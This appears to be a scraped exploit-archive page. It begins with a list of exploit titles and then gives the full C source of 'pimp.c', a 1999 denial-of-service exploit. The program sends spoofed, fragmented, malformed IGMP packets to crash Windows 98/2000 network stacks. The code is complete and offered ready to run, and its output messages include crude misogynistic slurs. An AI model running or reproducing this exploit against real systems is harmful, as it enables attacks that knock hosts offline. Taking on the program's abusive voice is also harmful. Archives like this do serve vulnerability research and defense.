880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
126 lines
No EOL
3 KiB
C
126 lines
No EOL
3 KiB
C
// source: https://www.securityfocus.com/bid/514/info
|
|
|
|
|
|
The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably tolerate malformed IGMP headers. When one is received, the stack will sometimes fail with unpredictable results ranging from a Blue Screen to instantaneous reboot.
|
|
|
|
/*
|
|
** pimp.c 6/4/99 by Rob Mosher: nyt@deadpig.org
|
|
** exploits bug in m$'s ip stack
|
|
** rewrite by nyt@EFnet
|
|
** bug found by klepto
|
|
** usage: pimp <host>
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
#include <time.h>
|
|
#include <netdb.h>
|
|
#include <netinet/in.h>
|
|
#include <netinet/in_systm.h>
|
|
#include <netinet/ip.h>
|
|
#include <sys/socket.h>
|
|
|
|
struct igmp
|
|
{
|
|
unsigned char igmp_type;
|
|
unsigned char igmp_code;
|
|
unsigned short igmp_cksum;
|
|
struct in_addr igmp_group;
|
|
};
|
|
|
|
#define ERROR(a) {printf("ERROR: %s\n", a);exit(-1);}
|
|
|
|
u_long resolve(char *);
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
int nsock, ctr;
|
|
char *pkt, *data;
|
|
struct ip *nip;
|
|
struct igmp *nigmp;
|
|
struct sockaddr_in s_addr_in;
|
|
|
|
setvbuf(stdout, NULL, _IONBF, 0);
|
|
|
|
printf("pimp.c by nyt\n");
|
|
|
|
if(argc != 2)
|
|
ERROR("usage: pimp <host>");
|
|
|
|
if((nsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
|
|
ERROR("could not create raw socket");
|
|
|
|
pkt = malloc(1500);
|
|
if(!pkt)
|
|
ERROR("could not allocate memory");
|
|
|
|
memset(&s_addr_in, 0, sizeof(s_addr_in));
|
|
memset(pkt, 0, 1500);
|
|
|
|
nip = (struct ip *) pkt;
|
|
nigmp = (struct igmp *) (pkt + sizeof(struct ip));
|
|
data = (char *)(pkt + sizeof(struct ip) + sizeof(struct igmp));
|
|
memset(data, 'A', 1500-(sizeof(struct ip) + sizeof(struct igmp)));
|
|
|
|
s_addr_in.sin_addr.s_addr = resolve(argv[1]);
|
|
|
|
nip->ip_v = 4;
|
|
nip->ip_hl = 5;
|
|
nip->ip_tos = 0;
|
|
nip->ip_id = 69;
|
|
nip->ip_ttl = 255;
|
|
nip->ip_p = IPPROTO_IGMP;
|
|
nip->ip_sum = 0;
|
|
nip->ip_dst.s_addr = s_addr_in.sin_addr.s_addr;
|
|
nip->ip_src.s_addr = 2147100000;
|
|
nigmp->igmp_type = 2;
|
|
nigmp->igmp_code = 31;
|
|
nigmp->igmp_cksum = 0;
|
|
|
|
inet_aton("128.1.1.1", &nigmp->igmp_group);
|
|
|
|
printf("pimpin' dem trick-ass-bitches");
|
|
|
|
for(ctr = 0;ctr < 15;ctr++)
|
|
{
|
|
printf(".");
|
|
nip->ip_len = 1500;
|
|
nip->ip_off = htons(IP_MF);
|
|
sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
|
|
sizeof(s_addr_in));
|
|
|
|
nip->ip_off = htons(1480/8)|htons(IP_MF);
|
|
sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
|
|
sizeof(s_addr_in));
|
|
|
|
nip->ip_off = htons(5920/8)|htons(IP_MF);
|
|
sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
|
|
sizeof(s_addr_in));
|
|
|
|
nip->ip_len = 831;
|
|
nip->ip_off = htons(7400/8);
|
|
sendto(nsock, pkt, 831, 0, (struct sockaddr *) &s_addr_in,
|
|
sizeof(s_addr_in));
|
|
|
|
usleep(500000);
|
|
}
|
|
|
|
printf("*slap* *slap* bitch, who yo daddy\n");
|
|
shutdown(nsock, 2);
|
|
close(nsock);
|
|
}
|
|
|
|
u_long resolve(char *host)
|
|
{
|
|
struct hostent *he;
|
|
u_long ret;
|
|
|
|
if(!(he = gethostbyname(host)))
|
|
{
|
|
herror("gethostbyname()");
|
|
exit(-1);
|
|
}
|
|
memcpy(&ret, he->h_addr, sizeof(he->h_addr));
|
|
return ret;
|
|
} |